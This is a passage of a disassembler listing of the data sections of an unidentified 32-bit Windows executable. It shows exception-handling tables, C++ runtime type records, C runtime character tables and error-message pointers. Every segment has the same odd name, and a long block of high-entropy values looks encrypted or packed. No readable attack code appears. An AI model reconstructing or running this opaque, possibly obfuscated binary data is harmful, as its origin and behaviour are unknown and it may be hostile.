dd offset off_4259BC
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421090h
dword_4210C8 dd 3 dup(0) ; DATA XREF: J8@F_7_S:00420BC8�o
dd offset off_4259D8
dd offset dword_4210DC
dword_4210DC dd 2 dup(0) ; DATA XREF: J8@F_7_S:004210D8�o
dd 2, 4210ECh, 4210F8h, 420EACh, 0
dd offset off_4259D8
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4210DCh
dword_421114 dd 3 dup(0) ; DATA XREF: J8@F_7_S:00420BC0�o
dd offset off_4259F4
dd offset dword_421128
dword_421128 dd 2 dup(0) ; DATA XREF: J8@F_7_S:00421124�o
dd 2, 421138h, 421144h, 420EACh, 0
dd offset off_4259F4
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421128h
dword_421160 dd 3 dup(0) ; DATA XREF: J8@F_7_S:00420D28�o
dd offset off_425A10
dd offset dword_421174
dword_421174 dd 2 dup(0) ; DATA XREF: J8@F_7_S:00421170�o
dd 2, 421184h, 421190h, 420EACh, 0
dd offset off_425A10
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 421174h
dword_4211AC dd 3 dup(0) ; DATA XREF: J8@F_7_S:00420D20�o
dd offset off_425A2C
dd offset dword_4211C0
dword_4211C0 dd 2 dup(0) ; DATA XREF: J8@F_7_S:004211BC�o
dd 2, 4211D0h, 4211DCh, 420EACh, 0
dd offset off_425A2C
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 4211C0h
dword_4211F8 dd 3 dup(0) ; DATA XREF: J8@F_7_S:00420D18�o
dd offset off_425A48
dd offset dword_42120C
dword_42120C dd 2 dup(0) ; DATA XREF: J8@F_7_S:00421208�o
dd 2, 42121Ch, 421228h, 420EACh, 0
dd offset off_425A48
dd 1, 0
dd 0FFFFFFFFh, 0
dd 40h, 42120Ch, 3 dup(0)
dword_421250 dd 42C4h, 43C9h, 6640h, 8658h, 0EB68h, 1C1D3h, 1C1EEh
; DATA XREF: J8@F_7_S:00420D80�o
dd 1C209h, 1C22Ch, 1C24Fh, 1C274h, 1C299h, 1C2BCh, 1C2E1h
dd 1C313h, 1C348h, 0
dword_421294 dd 2 dup(0) ; DATA XREF: sub_40B042+2�o
; sub_40B042+7�o
dword_42129C dd 2 dup(0) ; DATA XREF: sub_40B066+2�o
; sub_40B066+7�o
dd offset sub_40264D
dd 0
dd offset dword_4212DC
dd 0FFFFFFFFh, 41C1CBh
dword_4212B8 dd 19930522h, 1, 4212B0h, 5 dup(0) ; DATA XREF: J8@F_7_S:0041C1E4�o
dd 1
dword_4212DC dd 3, 4212ECh, 421940h, 42195Ch, 0 ; DATA XREF: J8@F_7_S:004212AC�o
dd offset off_423008
align 8
dd 0FFFFFFFFh, 0
dd 28h, 4026F8h, 0FFFFFFFEh, 0
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_402AD7
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_402E1B
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4031EA
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40334C
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403535
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403659
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4036D7
align 8
dd 0FFFFFFFEh, 0
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_403D75
align 8
dword_421408 dd 0FFFFFFFEh, 0 ; DATA XREF: J8@F_7_S:00403F3A�o
dd 0FFFFFF80h, 0
dd 0FFFFFFFEh, 4040FFh, 404103h, 0FFFFFFFEh, 4040C5h, 4040D9h
dword_421430 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4049A0+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_404A38
align 10h
dword_421450 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_404C69+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_404DCA
align 10h
dword_421470 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4050B1+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40511B
align 10h
dword_421490 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405266+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_405311
align 10h
dword_4214B0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4053B5+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4054BE
dd 0FFFFFFFEh, 0
dd offset sub_4054CA
dword_4214D8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_405934+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4059EE
align 8
dword_4214F8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407A0B+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset loc_407AC1
align 8
dword_421518 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_407F55+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_407FBC
align 8
dword_421538 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4084A1+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_4085BB
align 8
dword_421558 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4087E0+2�o
dd 0FFFFFF8Ch, 0
dd 0FFFFFFFEh, 408A09h, 408A0Dh, 0
dword_421578 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408AE1+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_408BA4
align 8
dword_421598 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_408C7E+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_408D4F
dd 2 dup(0)
dd offset sub_408D1B
dword_4215C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40A34F+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40A421
align 10h
dword_4215E0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B29C+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40B35C
align 10h
dd offset loc_40B31E
dd offset loc_40B328
dword_421608 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B3C2+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40B405h, 40B40Eh, 40h, 2 dup(0)
dd offset sub_40B4E5
dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 421624h
dword_421658 dd 19930522h, 2, 421634h, 1, 421644h, 3 dup(0)
; DATA XREF: J8@F_7_S:0041C1FF�o
dd 1, 0
dword_421680 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B4FD+2�o
dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40B61D
align 10h
dd offset loc_40B58D
dd offset loc_40B596
dword_4216A8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B699+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40B804h, 40B808h, 0
dword_4216C8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40B818+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40B89Dh, 40B8A1h
dword_4216E4 dd 0 ; DATA XREF: sub_40BA07+162�o
dd offset sub_40B1CF
align 10h
dd offset dword_4216F4
dword_4216F4 dd 2, 421700h, 42195Ch, 0 ; DATA XREF: J8@F_7_S:004216F0�o
dd offset off_423E50
dd 0
dd 0FFFFFFFFh, 0
dd 0Ch, 40BD5Dh, 0
dword_421720 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BE59+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40BE79h, 40BE7Dh, 0
dword_421740 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40BEA5+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40BEC9h, 40BECDh, 0
dword_421760 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CB14+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 40CB9Ah, 40CBB1h, 0
dword_421780 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CC52+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 40CC98h, 40CCACh, 0
dword_4217A0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40CD41+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_40CE50
align 10h
dword_4217C0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40D420+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40D4F2
align 10h
dword_4217E0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40D94F+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DA46
align 10h
dword_421800 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DA6D+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DBAB
align 10h
dword_421820 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DD29+2�o
dd 0FFFFFFC0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40DE97
align 10h
dword_421840 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40DFD3+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40E069
align 10h
dword_421860 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40E6B0+2�o
dd 0FFFFFFCCh, 0
dd 0FFFFFFFEh, 0
dd offset sub_40E749
align 10h
dword_421880 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40EDEE+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40EE80
align 10h
dword_4218A0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40EEB0+2�o
dd 0FFFFFFC8h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40F046
dd 2 dup(0)
dd offset sub_40EF7D
dword_4218C8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40F04F+2�o
dd 0FFFFFFD0h, 0
dd 0FFFFFFFEh, 0
dd offset sub_40F126
align 8
dword_4218E8 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_40F789+2�o
dd 0FFFFFFD4h, 0
dd 0FFFFFFFEh, 40F7A6h, 40F7C2h, 0
dword_421908 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_4100DA+2�o
dd 0FFFFFFD8h, 0
dd 0FFFFFFFEh, 410107h, 410123h, 0
dd offset off_425918
align 10h
dd 0FFFFFFFFh, 0
dd 28h, 4013CEh, 0
dd offset off_425938
dd 0
dd 0FFFFFFFFh, 0
dd 28h, 4013E6h, 0
dd offset off_425958
align 8
dd 0FFFFFFFFh, 0
dword_421970 dd 0Ch, 402C72h, 3, 421924h, 421940h, 42195Ch, 0
; DATA XREF: J8@F_7_S:00421994�o
dd offset loc_4010E1
dd 0
dd offset dword_421970+8
dd 0
dd offset off_425974
dd 0
dd 0FFFFFFFFh, 0
dword_4219AC dd 0Ch, 401637h, 2, 421998h, 42195Ch, 0 ; DATA XREF: J8@F_7_S:004219CC�o
dd offset sub_401038
dd 0
dd offset dword_4219AC+8
dword_4219D0 dd 0FFFFFFFEh, 0 ; DATA XREF: sub_419760+2�o
dd 0FFFFFFB4h, 0
dd 0FFFFFFFEh, 5 dup(0)
dd 0FFFFFFFFh, 41C26Ah
dword_421A00 dd 19930522h, 1, 4219F8h, 5 dup(0) ; DATA XREF: J8@F_7_S:0041C285�o
dd 1, 0FFFFFFFFh, 41C28Fh
dword_421A2C dd 19930522h, 1, 421A24h, 5 dup(0) ; DATA XREF: J8@F_7_S:0041C2AA�o
dd 1, 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 0
dd 1, 0
dd 1, 0
dd 40h, 2 dup(0)
dd offset sub_40150F
dd 40h, 2 dup(0)
dd offset loc_40149D
dd 2 dup(2), 3, 1, 421A70h, 2 dup(0)
dd 3, 1, 421A80h
dword_421AB8 dd 19930522h, 4, 421A50h, 2, 421A90h, 3 dup(0)
; DATA XREF: J8@F_7_S:0041C21A�o
dd 1, 0
dd 0FFFFFFFFh, 41C224h
dword_421AE8 dd 19930522h, 1, 421AE0h, 5 dup(0) ; DATA XREF: J8@F_7_S:0041C23D�o
dd 1, 0
dd 0FFFFFFFFh, 41C247h
dword_421B18 dd 19930522h, 1, 421B10h, 5 dup(0) ; DATA XREF: J8@F_7_S:0041C260�o
dd 1, 0
dd 0FFFFFFFFh, 41C2B4h
dword_421B48 dd 19930522h, 1, 421B40h, 5 dup(0) ; DATA XREF: J8@F_7_S:0041C2CD�o
dd 1, 0
dd 0FFFFFFFFh, 41C2D7h
dword_421B78 dd 19930522h, 1, 421B70h, 5 dup(0) ; DATA XREF: J8@F_7_S:0041C2FC�o
dd 1, 0
dd 0FFFFFFFFh, 41C306h
dword_421BA8 dd 19930522h, 1, 421BA0h, 5 dup(0) ; DATA XREF: J8@F_7_S:0041C331�o
dd 1, 0
dd 0FFFFFFFFh, 41C33Bh
dword_421BD8 dd 19930522h, 1, 421BD0h, 5 dup(0) ; DATA XREF: J8@F_7_S:0041C366�o
dd 1, 35D5A051h, 0C7C0F3C6h, 12CF5927h, 0A83D0345h, 56BBFC05h
dd 0C46AB159h, 0E41116D5h, 0E41B1B4Dh, 512CD20Ch, 0F1E223E2h
dd 7AE6E5EAh, 85491969h, 4B495A20h, 0BD4AACEBh, 0A3A4AA5Eh
dd 7145BD30h, 62B23C29h, 2E12EABAh, 482AF270h, 0AD532319h
dd 0EF1D9209h, 55D3E9BAh, 36B7DC4Ch, 0E361B2DAh, 2BBAD513h
dd 7E515168h, 5C4CD89Dh, 1C3B7A8Eh, 55FC91B0h, 0A38555A7h
dd 2ECDEDA9h, 98048687h, 719C317h, 13A91543h, 6BA32B91h
dd 0BDBFA53Ah, 1263660Ch, 0F05DA3Ah, 0A07428D6h, 2DA46F7Fh
dd 0F32F730Bh, 8469CCFh, 4C3E76B5h, 95658ECh, 4AC74EDCh
dd 57ADECC7h, 0C12B8944h, 0D6EFBFFCh, 83770474h, 2921C160h
dd 881F4E7Bh, 5E63D830h, 9E454562h, 0ED967812h, 526BE610h
dd 0E175A4F2h, 94F21035h, 0E762134Fh, 0A9E62F5Ch, 8AF146A4h
dd 577FF0FEh, 0B7B4B61Bh, 4CBAF9AEh, 0DCBCFD4Fh, 63E3A9A3h
dd 0C8D3A30Eh, 784F32F0h, 649B5BA9h, 0BA9E108h, 0A30A3A3Ah
dd 0A5EBAFB5h, 0DEFCDB7Bh, 96F36F44h, 0E57BB340h, 861D783h
dd 30BAB01Dh, 1233F44Eh, 6341934Ah, 0FA5475B1h, 0BDCBCBA5h
dd 417B98B7h, 2E5F9EA0h, 196E183Ah, 1B744680h, 3BA2987h
dd 0B132140Dh, 9D458A5Dh, 0A52EAAA1h, 0DDE89F34h, 71CEF684h
dd 84B14B23h, 536F1BF9h, 738EC933h, 0D12A04C8h, 7C8009D2h
dd 39BE0F1h, 575C709h, 0E42022D1h, 9345C1E0h, 7BF5346Bh
dd 7787404Bh, 35A87ABAh, 0E636D90Ch, 0AB25251Eh, 1A405ADBh
dd 0C58E03C2h, 9959867Ch, 0C01C7BB6h, 202582ECh, 7959A95Eh
dd 706EC64Bh, 0BF0AF5BCh, 0CC899939h, 601D6533h, 86059E85h
dd 763436DBh, 58664C10h, 8D1A5BFDh, 0B50BB6D0h, 742AFB9Ah
dd 6ACFB3DDh, 649ABCB3h, 5AB8E108h, 2067CBD1h, 22AABB15h
dd 226D9DF3h, 4B4AF47Fh, 1CE051FAh, 52AA8A89h, 53A4EE44h
dd 0A00481C4h, 6B8FF80h, 13772666h, 2196980Ch, 0DB660E2Bh
dd 1A37768Bh, 992B63F5h, 0BAB78600h, 6B23246Fh, 0A111519Ch
dd 0FF3D0A59h, 2FA1BF59h, 362CD3D6h, 0B84F2C70h, 10140DAh
dd 0D493D0EFh, 45C86CB8h, 11397C10h, 0AFA59B8Ah, 0F42C76BCh
dd 8BA6057Dh, 835C5EEFh, 3C23857Ah, 1F3D7C8Eh, 126DC033h
dd 1872437Eh, 2C3A6EC4h, 7AC628ECh, 3179D08Fh, 0C3EA64B1h
dd 0B15AB6FDh, 458F5D7Dh, 0C7D9CD36h, 93971AE8h, 27042076h
dd 598FA999h, 0DB2B132Fh, 0DA8ADD6Fh, 0C98EC5CEh, 0FB4A4CE6h
dd 0B0DE9F9Ah, 0EDDA1BDDh, 6BDB6A27h, 946B3A1Ah, 868713E5h
dd 0CD69E9D1h, 0C38C2D62h, 0FC80EAF8h, 7074580Ah, 0FCB05F9Ah
dd 3107A0DDh, 137492AEh, 5AAB7A68h, 0E7103764h, 0FA4F75A4h
dd 988FD4EBh, 575FD66Fh, 75BCBE1Fh, 3D740D3Ah, 22478693h
dd 3054C535h, 0B3A57457h, 0C42AEDADh, 0CE6F0F96h, 0C9FF35A2h
dd 58579895h, 5C67D23h, 0F054EA9Ch, 0E11D01D0h, 0CEC07A3Bh
dd 0C2B86B00h, 457C6606h, 70FEB089h, 763B80C1h, 2539288Ah
dd 0F1292954h, 0BC4B4CE4h, 9D3A7B0Dh, 5D277F54h, 8951204Dh
dd 7128523h, 845760Eh, 0FE6C4377h, 0BC8E60F6h, 0A0043D5Ah
dd 31ADFF80h, 0F9100965h, 3ECBCBA5h, 25C1693Ch, 50A3E2C1h
dd 8BD071FFh, 44CA9B46h, 0C703F0D1h, 7ECECCB5h, 0DEB7B08Eh
dd 1931FBC6h, 0E3A10B90h, 0A3F4B18Fh, 8CB27BA6h, 64270B18h
dd 0CCF96224h, 874EC22Eh, 0D32DCF2Eh, 0AE9F9D4Fh, 2715815Bh
dd 1D67997Eh, 77CF592Fh, 650CE591h, 0E95D96BDh, 0ABAA9FA2h
dd 0F6CFF15Eh, 0E960B4DBh, 0CDA29733h, 866264F2h, 4719756Ah
dd 0F6F031E9h, 7BEDADE9h, 208254BBh, 1F42D1C6h, 0DC8CA265h
dd 0D224A526h, 8424650Dh, 0C63AB4EDh, 3B9F179h, 0CFDAFDB8h
dd 781A7AF0h, 0F4FED0AFh, 330800CEh, 0A5656BE7h, 88D72694h
dd 0C621FB54h, 0EA2A2CD6h, 51DBC518h, 21418091h, 39878D77h
dd 0E40BDB9Eh, 0C57F94F9h, 445B8F09h, 0AA0AFE00h, 2C93C422h
dd 4E2EF3D7h, 78A3F1B8h, 3EE8DECFh, 123979F2h, 0B4F650CBh
dd 52CC02CFh, 4799CE29h, 0EFF2391Dh, 0E5E560B8h, 13232351h
dd 70D0471h, 863E72EBh, 97D39A49h, 52113414h, 538A8831h
dd 0FE449348h, 0B629B4EFh, 0CD06741Fh, 0A3BD9732h, 9B05D1DDh
dd 98D4DBD7h, 465FF6E6h, 0D9998A9Ch, 4DE310FDh, 558BE81Fh
dd 80B2C85Eh, 7AAFBAB6h, 93AECDE4h, 0D9EB8B2Fh, 0BDCFCD67h
dd 0C06A14DBh, 21AD1137h, 8B6F642Ch, 0B38AA649h, 0A3D23E39h
dd 42D05977h, 0A6F58F47h, 2518FAA1h, 0C8795A07h, 18EF401Eh
dd 0FB326460h, 3D5FDCEFh, 7F04093Eh, 0B5E7E7B3h, 0A9452707h
dd 4C9BDAC0h, 57ED07B2h, 0BFBD8F84h, 0F0D407AEh, 8FF0327Ah
dd 0E0DA3BD2h, 0AFA27F49h, 72ECDF36h, 30B895B0h, 0B357A5F8h
dd 1F3041D5h, 0E87D9A29h, 0CB67419Eh, 36B9DC10h, 1535B2DAh
dd 0A5E92BC2h, 0CA15154Ah, 29107431h, 0CF9EDF42h, 0CB890955h
dd 82471969h, 0D81C7D61h, 11F35341h, 23108F75h, 128BFFEBh
dd 0FAFDD0CEh, 92610481h, 66ED0E4Bh, 3563EEA2h, 0D39A8CD9h
dd 0BBA2984Ah, 0F812A2D3h, 0CE47C4E3h, 389CA6C0h, 94A9A994h
dd 0A2E5AA81h, 3365A4A5h, 7DA31A6Ch, 640ADE6Ch, 0E14A6AD9h
dd 3F4FCF63h, 24FABEFEh, 0D6FE4772h, 3ACC0BA5h, 25909236h
dd 439524FDh, 478DCCB9h, 365B40FEh, 0B2A77955h, 0A952A56Dh
dd 0EFB0CE2Dh, 35D23CEAh, 77517F92h, 0BF2DC383h, 0E6FCF26Bh
dd 76EF2E49h, 0BADCh, 38Dh dup(0)
J8@F_7_S ends
; Section 3. (virtual address 00023000)
; Virtual size : 00012000 ( 73728.)
; Section size in file : 00012000 ( 73728.)
; Offset to raw data for section: 00023000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
J8@F_7_S segment para public 'BSS' use32
assume cs:J8@F_7_S
;org 423000h
assume es:nothing, ss:nothing, ds:J8@F_7_S, fs:nothing, gs:nothing
dd offset dword_41D300
dd offset dword_41D300
off_423008 dd offset off_41D38C ; DATA XREF: J8@F_7_S:00420D94�o
; J8@F_7_S:00420DBC�o ...
align 10h
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
dd offset dword_41D300
dd offset dword_41D300
off_423030 dd offset off_41D38C ; DATA XREF: J8@F_7_S:00420DF8�o
; J8@F_7_S:00420E18�o
align 8
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset dword_41D300
align 10h
dword_423050 dd 2 ; DATA XREF: sub_409AB4+42�r
; sub_409C54+19�r ...
align 10h
dd offset sub_40B11E
dword_423064 dd 0BB40E64Eh ; DATA XREF: sub_401C1D+9�r
; sub_401CC0+C�r ...
dword_423068 dd 44BF19B1h ; DATA XREF: sub_40468E+AE�r
; sub_40B08A+29�w ...
align 10h
dword_423070 dd 17h dup(0) ; DATA XREF: sub_4047C1+29�o
; sub_4049A0+63�o ...
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 31h dup(0)
dd 62610000h, 66656463h, 6A696867h, 6E6D6C6Bh, 7271706Fh
dd 76757473h, 7A797877h, 0
db 0
align 2
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
align 4
dd 21h dup(0)
byte_423290 db 0 ; DATA XREF: sub_404C69+102�w
align 4
dd 0Fh dup(0)
dd 10100000h, 6 dup(10101010h), 0
dd 20200000h, 6 dup(20202020h), 23h dup(0)
byte_423398 db 0 ; DATA XREF: sub_404C69+11E�w
align 4
dd 0Fh dup(0)
dd 63626100h, 67666564h, 6B6A6968h, 6F6E6D6Ch, 73727170h
dd 77767574h, 7A7978h, 0
db 0
aAbcdefghijkl_0 db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0
dd 21h dup(0)
off_423498 dd offset dword_423070 ; DATA XREF: sub_40271F+41�r
; sub_4049A0+4C�r ...
byte_42349C db 1 ; DATA XREF: sub_404ABE+E3�r
db 2, 4, 8
dword_4234A0 dd 3A4h ; DATA XREF: sub_404ABE:loc_404AFA�r
dword_4234A4 dd 82798260h ; DATA XREF: sub_404ABE+12B�r
dd 21h, 0
dword_4234B0 dd 0DFA6h ; DATA XREF: sub_404ABE+C6�r
align 8
dd 0A5A1h, 0
dd 0FCE09F81h, 0
dd 0FC807E40h, 0
dd 3A8h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE40h, 0
dd 3B5h, 0A3DAA3C1h, 20h, 5 dup(0)
dd 0FE81h, 0
dd 0FE41h, 0
dd 3B6h, 0A2E4A2CFh, 0A2E5001Ah, 5BA2E8h, 4 dup(0)
dd 0FE81h, 0
dd 0FEA17E40h, 0
dd 551h, 0DA5EDA51h, 0DA5F0020h, 32DA6Ah, 4 dup(0)
dd 0DED8D381h, 0F9E0h, 0FE817E31h, 0
dd offset dword_41DF40+4
dword_423594 dd 0FFFFFFFEh ; DATA XREF: sub_40271F+2C�r
; sub_40271F+4C�r ...
dword_423598 dd 43h, 0 ; DATA XREF: sub_404E21:loc_404F1E�o
; sub_404F61:loc_404FAC�o ...
dword_4235A0 dd 1, 15h dup(0) ; DATA XREF: sub_405073+28�o
; sub_4053B5+DA�o ...
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd offset dword_423598
dd 3 dup(0)
dd 2 dup(1), 3 dup(0)
dd offset off_423F38
dd 2 dup(0)
off_423668 dd offset asc_41DD40 ; DATA XREF: sub_40F17F+D�r
; sub_40F1FC+D�r ...
; " ((((( H"
dd offset dword_41E148+80h
dd offset dword_41E148+200h
dd offset off_423E78
off_423678 dd offset dword_4235A0 ; DATA XREF: sub_40271F+24�r
; sub_4050B1+4E�r ...
dd 1
off_423680 dd offset dword_4235A0 ; DATA XREF: sub_40A9EB+17�o
dd offset dword_423070
dword_423688 dd 0FFFFFFFFh ; DATA XREF: sub_405127+13�r
; sub_405193+13�r ...
dword_42368C dd 0FFFFFFFFh ; DATA XREF: sub_405127+1�r
; sub_405127+1E�r ...
dword_423690 dd 1 ; DATA XREF: sub_405798:loc_40579E�r
dword_423694 dd 16h ; DATA XREF: sub_405798:loc_4057B9�r
dd 2 dup(2), 3, 2, 4, 18h, 5, 0Dh, 6, 9, 7, 0Ch, 8, 0Ch
dd 9, 0Ch, 0Ah, 7, 0Bh, 8, 0Ch, 16h, 0Dh, 16h, 0Fh, 2
dd 10h, 0Dh, 11h, 2 dup(12h), 2, 21h, 0Dh, 35h, 2, 41h
dd 0Dh, 43h, 2, 50h, 11h, 52h, 0Dh, 53h, 0Dh, 57h, 16h
dd 59h, 0Bh, 6Ch, 0Dh, 6Dh, 20h, 70h, 1Ch, 72h, 9, 6, 16h
dd 80h, 0Ah, 81h, 0Ah, 82h, 9, 83h, 16h, 84h, 0Dh, 91h
dd 29h, 9Eh, 0Dh, 0A1h, 2, 0A4h, 0Bh, 0A7h, 0Dh, 0B7h
dd 11h, 0CEh, 2, 0D7h, 0Bh, 718h, 0Ch
dword_4237F8 dd 0Ch ; DATA XREF: sub_4057D3+9�o
dword_4237FC dd 8 ; DATA XREF: sub_4057E6+9�o
dword_423800 dd 0 ; DATA XREF: sub_405881:loc_4058BE�w
; sub_4058CA+8�o ...
dword_423804 dd 1 ; DATA XREF: sub_405881:loc_40588A�r
dd 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 3 dup(0)
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 3 dup(0)
dd 1, 0
dd 1, 0
dd 1, 22h dup(0)
dword_423920 dd 10h ; DATA XREF: sub_4058CA+2A�o
; sub_4058CA+4A�o
off_423924 dd offset aNull_0 ; DATA XREF: sub_4069D7:loc_406EC5�r
; sub_4069D7+7E7�r
; "(null)"
off_423928 dd offset aNull ; DATA XREF: sub_4069D7+433�r
; "(null)"
align 10h
off_423930 dd offset sub_407AEA ; DATA XREF: sub_40785D+E�r
; sub_407B19+45�w
dd 3 dup(0)
dd offset dword_41D300
align 10h
off_423950 dd offset dword_433DC0 ; DATA XREF: sub_408084�o
; sub_40808A+52�o ...
align 8
dd offset dword_433DC0
dd 101h
dword_423960 dd 2 dup(0) ; DATA XREF: sub_40808A+74�o
dd 1000h, 4 dup(0)
dd 2, 1, 6 dup(0)
dd 2 dup(2), 7 dup(0)
dword_4239C0 dd 7Ch dup(0) ; DATA XREF: sub_40808A+A4�o
dword_423BB0 dd 8 dup(0) ; DATA XREF: sub_40815B+D�o
; sub_4081AD+D�o
dword_423BD0 dd 0FFFFFFFFh, 0A80h, 0Ah dup(0) ; DATA XREF: sub_4067D6:loc_4068DC�o
; sub_4069D7:loc_406AB3�o ...
dword_423C00 dd 2 ; DATA XREF: sub_409AB4:loc_409AC0�r
off_423C04 dd offset aR6002FloatingP ; DATA XREF: sub_409AB4:loc_409BE4�r
; "R6002\r\n- floating point not loaded\r\n"
dd 8, 41DA94h, 9, 41DA68h, 0Ah, 41D9D0h, 10h, 41D9A4h
dd 11h, 41D974h, 12h, 41D950h, 13h, 41D924h, 18h, 41D8ECh
dd 19h, 41D8C4h, 1Ah, 41D88Ch, 1Bh, 41D854h, 1Ch, 41D82Ch
dd 1Eh, 41D80Ch, 1Fh, 41D7A8h, 20h, 41D770h, 21h, 41D678h
dd 22h, 41D5D8h, 78h, 41D5C8h, 79h, 41D5B8h, 7Ah, 41D5A8h
dd 0FCh, 41D5A4h, 0FFh, 41D594h
byte_423CB8 db 0 ; DATA XREF: sub_409DAD:loc_40A10E�r
; sub_409DAD+36F�r
align 4
dd 2Fh dup(0)
dd 8 dup(1010101h), 4 dup(2020202h), 2 dup(3030303h), 2 dup(0)
dword_423DB8 dd 1B3Fh ; DATA XREF: sub_40A6EF+D�r
align 10h
dword_423DC0 dd 0C0000005h, 0Bh, 0 ; DATA XREF: sub_405266+1D�o
; sub_4053B5+6E�o
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
